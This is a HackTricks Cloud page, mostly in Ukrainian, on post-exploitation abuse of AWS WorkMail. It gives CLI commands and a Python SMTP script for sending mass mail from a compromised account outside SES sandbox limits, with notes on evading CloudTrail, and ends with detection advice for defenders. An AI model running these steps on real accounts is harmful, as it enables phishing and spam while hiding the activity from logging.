HackTricks CloudAWS - WorkMail Post Exploitation
Tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перегляньте the subscription plans!
- Приєднуйтесь до 💬 Discord group або до telegram group або стежте за нами в Twitter 🐦 @hacktricks_live.
- Діліться hacking tricks, надсилаючи PRs до HackTricks та HackTricks Cloud github repos.
Зловживання WorkMail для обходу SES sandbox
Навіть якщо SES застряг у sandbox (verified-recipient only, ~200 msgs/24h, 1 msg/s), WorkMail не має еквівалентного обмеження. Зловмисник з довгостроковими ключами може розгорнути тимчасову поштову інфраструктуру і почати надсилати негайно:
- Create a WorkMail org (region-scoped)
aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>
- Підтвердити домени, контрольовані атакуючим (WorkMail invokes SES APIs as
workmail.amazonaws.com):
aws ses verify-domain-identity --domain attacker-domain.com
aws ses verify-domain-dkim --domain attacker-domain.com
- Налаштувати користувачів поштових скриньок та зареєструвати їх:
aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com
Примітки:
- Типове recipient cap, задокументоване AWS: 100,000 external recipients/day per org (aggregated across users).
- Активність перевірки домену з’явиться в CloudTrail під SES, але з
invokedBy:workmail.<region>.amazonaws.com, тож SES verification events можуть належати налаштуванню WorkMail, а не SES-кампаніям. - Користувачі поштових скриньок WorkMail стають application-layer persistence, незалежними від IAM users.
Шляхи відправлення & прогалини в телеметрії
Web client (WorkMail UI)
- Відправки відображаються як
ses:SendRawEmailподії в CloudTrail. userIdentity.type=AWSService,invokedBy/sourceIPAddress/userAgent=workmail.<region>.amazonaws.com, тому істинна IP-адреса клієнта прихована.requestParametersвсе ще leak інформацію про відправника (source,fromArn,sourceArn, configuration set), що дозволяє корелювати з недавно verified domains/mailboxes.
SMTP (найменш помітний)
- Endpoint:
smtp.mail.<region>.awsapps.com:465(SMTP over SSL) with the mailbox password. - Жодні CloudTrail data events не генеруються для доставки через SMTP, навіть коли SES data events увімкнені.
- Ідеальні точки виявлення — org/domain/user provisioning та SES identity ARNs, на які посилаються в подальших веб-відправлених
SendRawEmailподіях.
Приклад надсилання SMTP через WorkMail
```python import smtplib from email.message import EmailMessageSMTP_SERVER = “smtp.mail.us-east-1.awsapps.com” SMTP_PORT = 465 EMAIL_ADDRESS = “marketing@attacker-domain.com” EMAIL_PASSWORD = “SuperSecretPassword!”
target = “victim@example.com” # can be unverified/external msg = EmailMessage() msg[“Subject”] = “WorkMail SMTP” msg[“From”] = EMAIL_ADDRESS msg[“To”] = target msg.set_content(“Delivered via WorkMail SMTP”)
with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp: smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD) smtp.send_message(msg)
</details>
## Рекомендації щодо виявлення
- Якщо WorkMail не потрібен, заблокуйте його через **SCPs** (`workmail:*` deny) на рівні організації.
- Сповіщайте про провізіонування: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, а також верифікації SES з `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
- Слідкуйте за аномальними подіями **`ses:SendRawEmail`**, коли identity ARNs посилаються на нові домени, а IP/UA джерела дорівнює `workmail.<region>.amazonaws.com`.
## Посилання
- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)
> [!TIP]
> Вивчайте та практикуйте AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Вивчайте та практикуйте GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Вивчайте та практикуйте Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Підтримайте HackTricks</summary>
>
> - Перегляньте the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Приєднуйтесь до** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) або до [**telegram group**](https://t.me/peass) або **стежте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Діліться hacking tricks, надсилаючи PRs до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>